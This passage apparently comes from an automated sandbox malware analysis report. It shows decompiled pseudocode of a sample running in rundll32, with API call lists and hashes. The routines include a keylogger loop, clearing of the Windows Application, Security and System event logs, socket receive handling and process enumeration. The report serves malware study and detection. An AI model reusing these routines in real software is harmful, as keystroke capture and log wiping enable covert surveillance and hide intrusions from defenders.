                                                            				void* _t30;
                                                            				void* _t32;
                                                            				void* _t33;
                                                            
                                                            				_push(_t25);
                                                            				_t30 = GetAsyncKeyState;
                                                            				while(1) {
                                                            					Sleep(5);
                                                            					_t32 = 0;
                                                            					asm("o16 nop [eax+eax]");
                                                            					do {
                                                            						_t1 = _t32 + 0x4684768; // 0x30
                                                            						if((GetAsyncKeyState( *_t1 & 0x0000ffff) & 0x00000001) != 0) {
                                                            							_t25 = _t25 & 0xffffff00 | GetKeyState(0x10) < 0x00000000;
                                                            							if((GetKeyState(0x14) & 0xffffff00 | _t22 > 0x00000000) == 0) {
                                                            								if(_t25 == 0) {
                                                            									_t11 = _t32 + 0x468476c; // 0x467e674
                                                            									_t27 =  *_t11;
                                                            								} else {
                                                            									_t10 = _t32 + 0x4684770; // 0x467e76c
                                                            									_t27 =  *_t10;
                                                            								}
                                                            							} else {
                                                            								if(_t25 == 0) {
                                                            									_t9 = _t32 + 0x4684774; // 0x467e674
                                                            									_t27 =  *_t9;
                                                            								} else {
                                                            									_t8 = _t32 + 0x4684778; // 0x467e76c
                                                            									_t27 =  *_t8;
                                                            								}
                                                            							}
                                                            							E0463B2E0(_t25, _t27, _t30, _t32);
                                                            						}
                                                            						_t32 = _t32 + 0x14;
                                                            					} while (_t32 < 0x3ac);
                                                            					_t33 = 0;
                                                            					do {
                                                            						_t12 = _t33 + 0x4684b18; // 0x8
                                                            						if((GetAsyncKeyState( *_t12 & 0x0000ffff) & 0x00000001) != 0) {
                                                            							_t15 = _t33 + 0x4684b1c; // 0x467e508
                                                            							E0463B2E0(_t25,  *_t15, _t30, _t33);
                                                            						}
                                                            						_t33 = _t33 + 8;
                                                            					} while (_t33 < 0x1c0);
                                                            				}
                                                            			}

                                                            APIs
                                                            • Sleep.KERNEL32(00000005), ref: 0463B852
                                                            • GetAsyncKeyState.USER32(00000030), ref: 0463B868
                                                            • GetKeyState.USER32(00000010), ref: 0463B870
                                                            • GetKeyState.USER32(00000014), ref: 0463B87E
                                                            • GetAsyncKeyState.USER32(00000008), ref: 0463B8CE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: State$Async$Sleep
                                                            • String ID:
                                                            • API String ID: 1722988271-0
                                                            • Opcode ID: fff270bd6c3de663794a9d850938976658e11664254a53c644ac178bf6249d27
                                                            • Instruction ID: 2021cb8926172e473f853566a12cd05146a8e60fc570803da59cee38dc8a0da2
                                                            • Opcode Fuzzy Hash: fff270bd6c3de663794a9d850938976658e11664254a53c644ac178bf6249d27
                                                            • Instruction Fuzzy Hash: 66110832A40385C6E7249764D809AF6B3A8EF81F46B0A061CEAD6173D2FF347C02D764
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 56%
                                                            			E046357F0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				void* _v15;
                                                            				intOrPtr _v19;
                                                            				char _v20;
                                                            				struct _WIN32_FIND_DATAW _v612;
                                                            				long _v616;
                                                            				signed int _t20;
                                                            				void* _t23;
                                                            				WCHAR* _t24;
                                                            				void* _t27;
                                                            				void* _t34;
                                                            				void* _t35;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            				WCHAR* _t45;
                                                            				long _t47;
                                                            				long _t48;
                                                            				signed int _t49;
                                                            
                                                            				_t20 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t20 ^ _t49;
                                                            				_t37 = __ecx;
                                                            				_t47 =  *(__ecx + 0x14);
                                                            				_t23 = _t47 - 2;
                                                            				if(_t23 == 0) {
                                                            					_t47 = 1;
                                                            				} else {
                                                            					_t34 = _t23 - 2;
                                                            					if(_t34 == 0) {
                                                            						_t47 = 3;
                                                            					} else {
                                                            						_t35 = _t34 - 2;
                                                            						if(_t35 == 0) {
                                                            							_t47 = _t35 + 5;
                                                            						}
                                                            					}
                                                            				}
                                                            				_t45 = _t37 + 0x18;
                                                            				if( *((intOrPtr*)(_t37 + 0x2c)) < 8) {
                                                            					_t24 = _t45;
                                                            				} else {
                                                            					_t24 =  *_t45;
                                                            				}
                                                            				_t40 = FindFirstFileW(_t24,  &_v612);
                                                            				_v12 = 0;
                                                            				asm("xorps xmm0, xmm0");
                                                            				asm("movq [ebp-0x10], xmm0");
                                                            				_v20 = 0x71;
                                                            				if(_t40 == 0xffffffff) {
                                                            					L16:
                                                            					_t48 = 2;
                                                            					asm("movq [ebp-0xf], xmm0");
                                                            				} else {
                                                            					if(_t47 != 1) {
                                                            						if(_t47 == 3) {
                                                            							goto L16;
                                                            						}
                                                            						if(_t47 != 5) {
                                                            							_t48 = _v616;
                                                            						} else {
                                                            							_v15 = 0xffffffff;
                                                            							_t48 = 3;
                                                            						}
                                                            						L17:
                                                            						FindClose(_t40);
                                                            						if(_t45[0xa] >= 8) {
                                                            							_t45 =  *_t45;
                                                            						}
                                                            						_t27 = CreateFileW(_t45, 0x40000000, 2, 0, _t48, 0x80, 0);
                                                            						if(_t27 != 0xffffffff) {
                                                            							CloseHandle(_t27);
                                                            						} else {
                                                            							_v15 = _t27;
                                                            						}
                                                            						_push(_t40);
                                                            						_push(0x3f);
                                                            						_push(9);
                                                            						E04631C60( *((intOrPtr*)(_t37 + 4)));
                                                            						return E04655AFE(_v8 ^ _t49,  &_v20);
                                                            					}
                                                            					_t48 = 3;
                                                            					_v19 = _v612.nFileSizeHigh;
                                                            					_v15 = _v612.nFileSizeLow;
                                                            				}
                                                            			}

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 04635844
                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 046358AA
                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 046358CA
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 046358DB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileFind$CreateFirstHandle
                                                            • String ID:
                                                            • API String ID: 3283578348-0
                                                            • Opcode ID: b528082a4d67e51dbae759062c7ff570c65b2eabeae6a40229049a0e7c5fd68f
                                                            • Instruction ID: cbff6afb9ed74a06381ae48266b8ac3e69aeca6b07aaa4c021cbdd25c390ff30
                                                            • Opcode Fuzzy Hash: b528082a4d67e51dbae759062c7ff570c65b2eabeae6a40229049a0e7c5fd68f
                                                            • Instruction Fuzzy Hash: F331C671E002A4FBDB249E68DC497A9B774EF05321F150A99E51BA7280F770BD81CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E0464F540(intOrPtr* __ecx) {
                                                            				long _t17;
                                                            				intOrPtr* _t23;
                                                            				long _t28;
                                                            				intOrPtr* _t29;
                                                            
                                                            				_t29 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x184)) != 0) {
                                                            					L12:
                                                            					return 1;
                                                            				} else {
                                                            					_t23 = __imp__#16;
                                                            					do {
                                                            						_t17 =  *_t23( *((intOrPtr*)(_t29 + 0x1c)),  *((intOrPtr*)(_t29 + 0x5c)),  *((intOrPtr*)(_t29 + 0x2c)), 0);
                                                            						_t28 = _t17;
                                                            						if(_t28 <= 0) {
                                                            							if(_t28 == 0xffffffff) {
                                                            								__imp__#111();
                                                            								if(_t17 != 0x2733) {
                                                            									goto L5;
                                                            								} else {
                                                            									goto L12;
                                                            								}
                                                            							} else {
                                                            								if(_t28 == 0) {
                                                            									 *((intOrPtr*)(_t29 + 0xc)) = 1;
                                                            									 *((intOrPtr*)(_t29 + 0x10)) = 5;
                                                            									 *(_t29 + 0x14) = 0;
                                                            									 *((intOrPtr*)(_t29 + 0x18)) = 1;
                                                            									return 0;
                                                            								} else {
                                                            									goto L8;
                                                            								}
                                                            							}
                                                            						} else {
                                                            							SetLastError(0);
                                                            							_push(_t28);
                                                            							_push( *((intOrPtr*)(_t29 + 0x5c)));
                                                            							if( *((intOrPtr*)( *_t29 + 0x8c))() != 2) {
                                                            								goto L8;
                                                            							} else {
                                                            								_t17 =  ==  ? 0x4c7 : GetLastError();
                                                            								L5:
                                                            								 *((intOrPtr*)(_t29 + 0xc)) = 1;
                                                            								 *((intOrPtr*)(_t29 + 0x10)) = 4;
                                                            								 *(_t29 + 0x14) = _t17;
                                                            								 *((intOrPtr*)(_t29 + 0x18)) = 1;
                                                            								return 0;
                                                            							}
                                                            						}
                                                            						goto L13;
                                                            						L8:
                                                            					} while ( *((intOrPtr*)(_t29 + 0x184)) == 0);
                                                            					return 1;
                                                            				}
                                                            				L13:
                                                            			}

                                                            APIs
                                                            • recv.WS2_32(?,?,?,00000000), ref: 0464F563
                                                            • SetLastError.KERNEL32(00000000), ref: 0464F56D
                                                            • GetLastError.KERNEL32 ref: 0464F586
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$recv
                                                            • String ID:
                                                            • API String ID: 316788870-0
                                                            • Opcode ID: 56309cf4f018c533b4005660ebe63600839bf8cf930f82004a81c72407b633e2
                                                            • Instruction ID: 90a1f5fb7696b4d9ef8683d7041060b5a673b61cf472ef0bdf568b89c90b53ea
                                                            • Opcode Fuzzy Hash: 56309cf4f018c533b4005660ebe63600839bf8cf930f82004a81c72407b633e2
                                                            • Instruction Fuzzy Hash: 1A1196722017009FEB388F5DD448757B7F1EB94325F10492EE146C6290DBB9E8459B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E0463A010(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char* _v12;
                                                            				char* _v16;
                                                            				char* _v20;
                                                            				signed int _t9;
                                                            				void* _t20;
                                                            				signed int _t22;
                                                            				signed int _t23;
                                                            
                                                            				_t9 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t9 ^ _t23;
                                                            				_v20 = "Application";
                                                            				_t22 = 0;
                                                            				_v16 = "Security";
                                                            				_v12 = "System";
                                                            				do {
                                                            					_t20 = OpenEventLogA(0,  *(_t23 + _t22 * 4 - 0x10));
                                                            					if(_t20 != 0) {
                                                            						ClearEventLogW(_t20, 0);
                                                            						CloseEventLog(_t20);
                                                            					}
                                                            					_t22 = _t22 + 1;
                                                            				} while (_t22 < 3);
                                                            				return E04655AFE(_v8 ^ _t23);
                                                            			}

                                                            APIs
                                                            • OpenEventLogA.ADVAPI32(00000000,0467E100), ref: 0463A046
                                                            • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0463A055
                                                            • CloseEventLog.ADVAPI32(00000000), ref: 0463A058
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Event$ClearCloseOpen
                                                            • String ID:
                                                            • API String ID: 1391105993-0
                                                            • Opcode ID: 2dc23772e75a68d2c122bd88502610c97c2606eccfa9d44a249b42d9e9100ac7
                                                            • Instruction ID: 09d76fcab3c8fa2fe3ccda55c08c0442e110febad31fa125bda488cdb997e130
                                                            • Opcode Fuzzy Hash: 2dc23772e75a68d2c122bd88502610c97c2606eccfa9d44a249b42d9e9100ac7
                                                            • Instruction Fuzzy Hash: 72F0F631A00208ABD7019F98AC8966FBBB4FF44605F00045DE90557201FF35AC059B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0465F37F(int _a4) {
                                                            				void* _t14;
                                                            				void* _t16;
                                                            
                                                            				if(E04669427(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                            					TerminateProcess(GetCurrentProcess(), _a4);
                                                            				}
                                                            				E0465F404(_t14, _t16, _a4);
                                                            				ExitProcess(_a4);
                                                            			}

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,0465F355,?,04681730,0000000C,0465F488,00000000,00000000,00000001,0465625B,046815D0,0000000C,04656104,?), ref: 0465F3A0
                                                            • TerminateProcess.KERNEL32(00000000,?,0465F355,?,04681730,0000000C,0465F488,00000000,00000000,00000001,0465625B,046815D0,0000000C,04656104,?), ref: 0465F3A7
                                                            • ExitProcess.KERNEL32 ref: 0465F3B9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: d82ffcb63d774a9e1d33836bb2421fa372a07bc86b0b495d20385b8cd5f5bf82
                                                            • Instruction ID: 7f68de3eb5887e428fcaef2a06e0bfe8b8496f04c8beb42ef06e22859d1ee17a
                                                            • Opcode Fuzzy Hash: d82ffcb63d774a9e1d33836bb2421fa372a07bc86b0b495d20385b8cd5f5bf82
                                                            • Instruction Fuzzy Hash: 13E0EC31000648AFDF19AF55D90CE583BA9EF54395F004418FD558A235EF79FDA2DB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E046356D0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v12;
                                                            				char _v16;
                                                            				char _v24;
                                                            				struct _WIN32_FIND_DATAW _v616;
                                                            				char _v620;
                                                            				signed int _t23;
                                                            				signed int _t25;
                                                            				short _t27;
                                                            				short _t29;
                                                            				void* _t40;
                                                            				intOrPtr* _t42;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				signed int _t46;
                                                            				intOrPtr _t50;
                                                            				intOrPtr* _t56;
                                                            				void* _t58;
                                                            				void* _t60;
                                                            				WCHAR* _t61;
                                                            				void* _t62;
                                                            				signed int _t63;
                                                            
                                                            				_t40 = __ebx;
                                                            				_t23 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t23 ^ _t63;
                                                            				_t56 = _a4 + 8;
                                                            				_t58 = __ecx;
                                                            				if( *_t56 != 0) {
                                                            					_t42 = _t56;
                                                            					_t60 = _t42 + 2;
                                                            					do {
                                                            						_t25 =  *_t42;
                                                            						_t42 = _t42 + 2;
                                                            						__eflags = _t25;
                                                            					} while (_t25 != 0);
                                                            					_t43 = _t42 - _t60;
                                                            					__eflags = _t43;
                                                            					_t44 = _t43 >> 1;
                                                            				} else {
                                                            					_t44 = 0;
                                                            				}
                                                            				_push(_t44);
                                                            				_t61 = _t58 + 0x18;
                                                            				_t45 = _t61;
                                                            				E046332A0(_t61, _t56);
                                                            				_t65 = _t61[0xa] - 8;
                                                            				if(_t61[0xa] < 8) {
                                                            					_t27 = _t61;
                                                            				} else {
                                                            					_t27 =  *_t61;
                                                            				}
                                                            				E04634670(_t45, _t65, _t27);
                                                            				_t46 =  *(_t58 + 0x28);
                                                            				if(_t61[0xa] < 8) {
                                                            					_t29 = _t61;
                                                            				} else {
                                                            					_t29 =  *_t61;
                                                            				}
                                                            				if( *((short*)(_t29 + _t46 * 2 - 2)) != 0x5c) {
                                                            					__eflags = _t61[0xa] - 8;
                                                            					if(_t61[0xa] >= 8) {
                                                            						_t61 =  *_t61;
                                                            					}
                                                            					_t62 = FindFirstFileW(_t61,  &_v616);
                                                            					__eflags = _t62 - 0xffffffff;
                                                            					if(_t62 == 0xffffffff) {
                                                            						L20:
                                                            						E046357F0(_t40, _t58, _t58, _t62);
                                                            					} else {
                                                            						_t50 =  *((intOrPtr*)(_t58 + 0x14));
                                                            						__eflags = _t50 - 4;
                                                            						if(_t50 == 4) {
                                                            							goto L20;
                                                            						} else {
                                                            							__eflags = _t50 - 2;
                                                            							if(_t50 == 2) {
                                                            								goto L20;
                                                            							} else {
                                                            								__eflags = _t50 - 6;
                                                            								if(_t50 == 6) {
                                                            									goto L20;
                                                            								} else {
                                                            									_push(_t50);
                                                            									_push(0x3f);
                                                            									_push(1);
                                                            									_push( &_v620);
                                                            									_v620 = 0x6e;
                                                            									E04631C60( *((intOrPtr*)(_t58 + 4)));
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					FindClose(_t62);
                                                            					__eflags = _v12 ^ _t63;
                                                            					return E04655AFE(_v12 ^ _t63);
                                                            				} else {
                                                            					_push(_t46);
                                                            					_push(0x3f);
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v16 = 0;
                                                            					_push(9);
                                                            					asm("movq [ebp-0x14], xmm0");
                                                            					_v24 = 0x71;
                                                            					E04631C60( *((intOrPtr*)(_t58 + 4)));
                                                            					return E04655AFE(_v12 ^ _t63,  &_v24);
                                                            				}
                                                            			}

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 04635787
                                                            • FindClose.KERNEL32(00000000), ref: 046357CB
                                                              • Part of subcall function 046357F0: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 04635844
                                                              • Part of subcall function 046357F0: FindClose.KERNEL32(00000000,?,00000000), ref: 046358AA
                                                              • Part of subcall function 046357F0: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 046358CA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirst$Create
                                                            • String ID:
                                                            • API String ID: 2053571766-0
                                                            • Opcode ID: e1dcee9b050a1cbe8608d77d3f74c34d223223f119d94c4da1a5697570021c1b
                                                            • Instruction ID: 5f0698e4f1888d7240483e761d99e8b5154771fefe60ff45180c28e5d9399dbf
                                                            • Opcode Fuzzy Hash: e1dcee9b050a1cbe8608d77d3f74c34d223223f119d94c4da1a5697570021c1b
                                                            • Instruction Fuzzy Hash: 6A310834B00284EBCB28DF68D884ABEB7B5EF45716F00025DD54767280FB707986CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E04644C00(void* __ebx, void* __edx, long __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				signed int _v16;
                                                            				char _v532;
                                                            				char _v540;
                                                            				short _v548;
                                                            				char _v1052;
                                                            				char _v1060;
                                                            				short _v1068;
                                                            				char _v1572;
                                                            				char _v1580;
                                                            				short _v1588;
                                                            				char _v2092;
                                                            				char _v2100;
                                                            				short _v2108;
                                                            				char _v2612;
                                                            				char _v2620;
                                                            				short _v2628;
                                                            				intOrPtr _v2636;
                                                            				intOrPtr _v2640;
                                                            				int _v2644;
                                                            				intOrPtr _v2648;
                                                            				char _v2652;
                                                            				void* _v2656;
                                                            				signed int _v2660;
                                                            				intOrPtr _v2668;
                                                            				char _v2676;
                                                            				short _v3200;
                                                            				intOrPtr _v3212;
                                                            				intOrPtr _v3216;
                                                            				long _v3220;
                                                            				char _v3224;
                                                            				void* _v3228;
                                                            				void* _v3232;
                                                            				void* _v3236;
                                                            				void* _v3244;
                                                            				int _v3248;
                                                            				long _v3252;
                                                            				void* _v3256;
                                                            				void* _v3260;
                                                            				long _v3264;
                                                            				signed int _t135;
                                                            				long _t160;
                                                            				_Unknown_base(*)()* _t170;
                                                            				void* _t172;
                                                            				int _t176;
                                                            				int _t178;
                                                            				int _t180;
                                                            				int _t184;
                                                            				int _t186;
                                                            				signed int _t208;
                                                            				void* _t253;
                                                            				void* _t255;
                                                            				void* _t257;
                                                            				void* _t258;
                                                            				void* _t265;
                                                            				long _t283;
                                                            				long _t284;
                                                            				void* _t285;
                                                            				void* _t287;
                                                            				void* _t289;
                                                            				void* _t291;
                                                            				void* _t292;
                                                            				void* _t293;
                                                            				void* _t295;
                                                            				void* _t297;
                                                            				void* _t298;
                                                            				void* _t300;
                                                            				void* _t303;
                                                            				signed int _t304;
                                                            				signed int _t306;
                                                            				signed int _t312;
                                                            				void* _t315;
                                                            				void* _t316;
                                                            
                                                            				_t273 = __edi;
                                                            				_t269 = __edx;
                                                            				_t306 = (_t304 & 0xfffffff8) - 0xcac;
                                                            				_t135 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t135 ^ _t306;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				E0465DEA0(__edi,  &_v3220, 0, 0x22c);
                                                            				E0465DEA0(_t273,  &_v2612, 0, 0x208);
                                                            				E0465DEA0(_t273,  &_v2092, 0, 0x208);
                                                            				E0465DEA0(_t273,  &_v1572, 0, 0x208);
                                                            				E0465DEA0(_t273,  &_v1052, 0, 0x208);
                                                            				E0465DEA0(_t273,  &_v532, 0, 0x208);
                                                            				_t312 = _t306 + 0x48;
                                                            				_v2640 = 7;
                                                            				_v2644 = 0;
                                                            				_v2660 = 0;
                                                            				_t253 = CreateToolhelp32Snapshot(2, 0);
                                                            				_v3228 = _t253;
                                                            				if(_t253 != 0xffffffff) {
                                                            					_v3224 = 0x22c;
                                                            					_t300 = LocalAlloc(0x40, 0x19000);
                                                            					_t273 = 1;
                                                            					_v3248 = _t300;
                                                            					_push( &_v3224);
                                                            					 *_t300 = 0x80;
                                                            					_v3252 = 1;
                                                            					if(Process32FirstW(_t253) != 0) {
                                                            						_t303 = lstrlenW;
                                                            						do {
                                                            							_t255 = OpenProcess(0x410, 0, _v3220);
                                                            							_t160 = _v3220;
                                                            							_v3236 = _t255;
                                                            							if(_t160 != 0 && _t160 != 4 && _t160 != 8) {
                                                            								_push(_t258);
                                                            								E046445C0(_t255, _t255,  &_v2620, _t273, _t303);
                                                            								E04645DD0(_t255,  &_v2620,  &_v1580, _t273, _t303,  &_v1060,  &_v540);
                                                            								_t265 = _t255;
                                                            								E04644440(_t265,  &_v2100, _t273, _t303);
                                                            								_t315 = _t312 + 0xc;
                                                            								_v3244 = 0;
                                                            								_t170 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            								if(_t170 != 0) {
                                                            									_t265 =  &_v3244;
                                                            									 *_t170(_t255, _t265);
                                                            								}
                                                            								_v3248 = 0;
                                                            								__imp__ProcessIdToSessionId(_v3220,  &_v3248);
                                                            								_t269 = _v3228;
                                                            								_push(_t265);
                                                            								_t172 = E04636060(_t255,  &_v2652, _v3228, _t273, _t303);
                                                            								_t316 = _t315 + 4;
                                                            								E04645370(_t255,  &_v2676, _t172);
                                                            								_t174 = _v2636;
                                                            								if(_v2636 >= 8) {
                                                            									E04633540(_t255, _t269, _t273, _v2652, _t174 + 1);
                                                            								}
                                                            								_t176 = lstrlenW( &_v3200);
                                                            								_t178 = lstrlenW( &_v548);
                                                            								_t180 = lstrlenW( &_v1068);
                                                            								_v3248 = _t176 + _t178 + _t180 + lstrlenW( &_v1588);
                                                            								_t184 = lstrlenW( &_v2108);
                                                            								_t186 = lstrlenW( &_v2628);
                                                            								_t257 = _v3260;
                                                            								_t283 = _v3264 + 0x22 + _t186 + _v2660 + _t184 + _v3248 + _t186 + _v2660 + _t184 + _v3248;
                                                            								if(LocalSize(_t257) < _t283) {
                                                            									_t257 = LocalReAlloc(_t257, _t283, 0x42);
                                                            									_v3260 = _t257;
                                                            								}
                                                            								_t284 = _v3264;
                                                            								 *(_t284 + _t257) = _v3228;
                                                            								 *((intOrPtr*)(_t284 + _t257 + 4)) = _v3212;
                                                            								 *((intOrPtr*)(_t284 + _t257 + 8)) = _v3216;
                                                            								_t285 = _t284 + 0xc;
                                                            								E0465E060(_t285 + _t257,  &_v3200, 2 + lstrlenW( &_v3200) * 2);
                                                            								_t287 = _t285 + lstrlenW( &_v3200) * 2 + 2;
                                                            								E0465E060(_t287 + _t257,  &_v2628, 2 + lstrlenW( &_v2628) * 2);
                                                            								_t208 = lstrlenW( &_v2628);
                                                            								_t258 =  >=  ? _v2676 :  &_v2676;
                                                            								_t289 = _t287 + _t208 * 2 + 2;
                                                            								E0465E060(_t289 + _t257, _t258, 2 + _v2660 * 2);
                                                            								_t291 = _t289 + _v2660 * 2 + 2;
                                                            								E0465E060(_t291 + _t257,  &_v2108, 2 + lstrlenW( &_v2108) * 2);
                                                            								_t292 = _t291 + lstrlenW( &_v2108) * 2;
                                                            								 *((intOrPtr*)(_t292 + _t257 + 2)) = _v3256;
                                                            								_t293 = _t292 + 6;
                                                            								E0465E060(_t293 + _t257,  &_v1588, 2 + lstrlenW( &_v1588) * 2);
                                                            								_t295 = _t293 + lstrlenW( &_v1588) * 2 + 2;
                                                            								E0465E060(_t295 + _t257,  &_v1068, 2 + lstrlenW( &_v1068) * 2);
                                                            								_t297 = _t295 + lstrlenW( &_v1068) * 2 + 2;
                                                            								E0465E060(_t297 + _t257,  &_v548, 2 + lstrlenW( &_v548) * 2);
                                                            								_t312 = _t316 + 0x54;
                                                            								_t298 = _t297 + lstrlenW( &_v548) * 2;
                                                            								 *(_t298 + _t257 + 2) = _v3252;
                                                            								_t273 = _t298 + 6;
                                                            								_t255 = _v3244;
                                                            								_v3264 = _t273;
                                                            							}
                                                            							CloseHandle(_t255);
                                                            							_t253 = _v3232;
                                                            						} while (Process32NextW(_t253,  &_v3228) != 0);
                                                            						_t300 = _v3256;
                                                            					}
                                                            					LocalReAlloc(_t300, _t273, 0x42);
                                                            					CloseHandle(_t253);
                                                            				} else {
                                                            				}
                                                            				_t259 = _v2648;
                                                            				if(_v2648 >= 8) {
                                                            					E04633540(_t253, _t269, _t273, _v2668, _t259 + 1);
                                                            				}
                                                            				return E04655AFE(_v16 ^ _t312);
                                                            			}
                                                            0x04644c00
                                                            0x04644c00
                                                            0x04644c06
                                                            0x04644c0c
                                                            0x04644c13
                                                            0x04644c1a
                                                            0x04644c1b
                                                            0x04644c1c
                                                            0x04644c29
                                                            0x04644c40
                                                            0x04644c57
                                                            0x04644c6e
                                                            0x04644c85
                                                            0x04644c9c
                                                            0x04644ca1
                                                            0x04644ca4
                                                            0x04644cb1
                                                            0x04644cbc
                                                            0x04644ccd
                                                            0x04644ccf
                                                            0x04644cd6
                                                            0x04644ce6
                                                            0x04644cf4
                                                            0x04644cf6
                                                            0x04644cff
                                                            0x04644d03
                                                            0x04644d05
                                                            0x04644d08
                                                            0x04644d14
                                                            0x04644d1a
                                                            0x04644d20
                                                            0x04644d31
                                                            0x04644d33
                                                            0x04644d37
                                                            0x04644d3d
                                                            0x04644d55
                                                            0x04644d5f
                                                            0x04644d85
                                                            0x04644d94
                                                            0x04644d96
                                                            0x04644d9b
                                                            0x04644d9e
                                                            0x04644db7
                                                            0x04644dbf
                                                            0x04644dc1
                                                            0x04644dc7
                                                            0x04644dc7
                                                            0x04644dcd
                                                            0x04644dda
                                                            0x04644de0
                                                            0x04644de4
                                                            0x04644dec
                                                            0x04644df1
                                                            0x04644dfc
                                                            0x04644e01
                                                            0x04644e0b
                                                            0x04644e16
                                                            0x04644e16
                                                            0x04644e27
                                                            0x04644e33
                                                            0x04644e3f
                                                            0x04644e57
                                                            0x04644e5b
                                                            0x04644e68
                                                            0x04644e6e
                                                            0x04644e7e
                                                            0x04644e88
                                                            0x04644e94
                                                            0x04644e96
                                                            0x04644e96
                                                            0x04644e9a
                                                            0x04644ea2
                                                            0x04644ea9
                                                            0x04644eb1
                                                            0x04644eba
                                                            0x04644ed0
                                                            0x04644eea
                                                            0x04644f03
                                                            0x04644f13
                                                            0x04644f24
                                                            0x04644f36
                                                            0x04644f46
                                                            0x04644f60
                                                            0x04644f79
                                                            0x04644f8b
                                                            0x04644f92
                                                            0x04644f96
                                                            0x04644fb7
                                                            0x04644fd4
                                                            0x04644fed
                                                            0x0464500a
                                                            0x04645023
                                                            0x04645028
                                                            0x04645035
                                                            0x0464503c
                                                            0x04645040
                                                            0x04645043
                                                            0x04645047
                                                            0x04645047
                                                            0x0464504c
                                                            0x04645052
                                                            0x04645062
                                                            0x0464506a
                                                            0x0464506a
                                                            0x04645072
                                                            0x0464507b
                                                            0x04644cd8
                                                            0x04644cd8
                                                            0x04645081
                                                            0x0464508b
                                                            0x04645096
                                                            0x04645096
                                                            0x046450b1

                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04644CC7
